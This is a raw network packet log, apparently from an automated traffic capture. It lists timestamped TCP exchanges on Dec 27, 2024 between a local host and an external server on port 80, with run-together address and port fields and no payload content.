                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.472912073 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.475227118 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.475354910 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.475393057 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.477776051 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.477873087 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.477927923 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.559771061 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622582912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622632027 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.622693062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624209881 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624255896 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.624294043 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625868082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625916958 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.625938892 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627471924 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627512932 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.627567053 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629102945 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629153967 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.629228115 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630743027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630786896 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.630839109 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632384062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632425070 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.632474899 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634033918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634083986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.634114027 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635695934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635744095 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.635763884 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637300968 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637347937 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.637353897 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.638979912 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.639029026 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.639096022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640567064 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640614033 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.640675068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642225981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642271996 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.642319918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643881083 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643915892 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.643923044 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645478010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645523071 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.645567894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647123098 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647169113 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.647178888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.695173025 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751760960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751807928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.751858950 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752366066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752490997 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.752535105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753643036 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753745079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.753789902 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.754935980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.755039930 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.755085945 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756165981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756254911 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.756309986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757422924 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757519960 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.757571936 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758660078 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758768082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.758819103 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759890079 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759907961 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.759948015 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761117935 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761199951 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.761259079 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762281895 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762393951 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.762439966 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763498068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763684034 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.763726950 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.764688015 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.764830112 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.805948973 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.806972980 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.807048082 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.807135105 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808099985 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808181047 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.808232069 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809212923 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809362888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.809406042 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810374022 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810441017 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.810488939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811476946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811634064 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.811691999 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.812581062 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.867038012 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943656921 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943700075 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.943774939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944192886 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944259882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.944304943 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945297003 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945348978 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.945394039 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946341038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946439981 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.946485043 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947487116 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947535038 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.947587967 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948551893 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948601007 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.948643923 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949557066 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949656010 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.949708939 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.950649023 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.950756073 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.950808048 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.951740026 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.951847076 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.951891899 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.952810049 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.952910900 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.952959061 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.953950882 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.953963995 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.954019070 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.954925060 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.955099106 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.955146074 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.956028938 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.956129074 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.956167936 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.957106113 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.957212925 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.957271099 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.958168030 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.958297014 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.958353043 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.959249020 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.959286928 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.959332943 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.960361004 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.960434914 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.960500002 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.961412907 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.961529016 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.961586952 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.962522030 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.962589979 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.962639093 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.963532925 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.963649988 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.963710070 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.964616060 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.964771986 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.964818001 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.965689898 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.965812922 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:32.965859890 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.139842987 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.139868975 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.140845060 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.140897989 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.140906096 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.141913891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.141974926 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.142005920 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.142982006 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.143037081 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.143084049 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.144090891 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.144154072 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.144192934 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.145167112 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.145215034 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.145240068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.146254063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.146331072 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.146332979 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.147320986 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.147363901 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.147365093 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.148432970 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.148454905 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.148507118 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.149462938 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.149528027 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.149547100 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.150542974 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.150628090 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.150645018 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.151591063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.151653051 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.151695013 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.152709007 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.152782917 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.152818918 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.153743029 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.153815985 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.153847933 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.154834032 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.154886961 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.155026913 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.155920029 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.155976057 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.155981064 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.156970978 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.157063007 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.157108068 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.158122063 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.158174992 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.158231974 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.159194946 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.159255981 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.159291983 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.160304070 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.160315990 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.160388947 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.161278963 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.161329985 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.161386967 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.162386894 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.162441015 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.162481070 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.163525105 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.163542032 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.163582087 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.164511919 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.164566994 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.164602995 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.165577888 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.165632963 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.165688992 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167129993 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167193890 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167251110 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167728901 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167779922 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.167838097 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.169061899 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.169101000 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.169117928 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.169913054 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.342972040 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.343080044 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.343317986 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.344060898 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.344166994 CET80497735.252.155.64192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.344340086 CET4977380192.168.2.65.252.155.64
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:33.345146894 CET80497735.252.155.64192.168.2.6
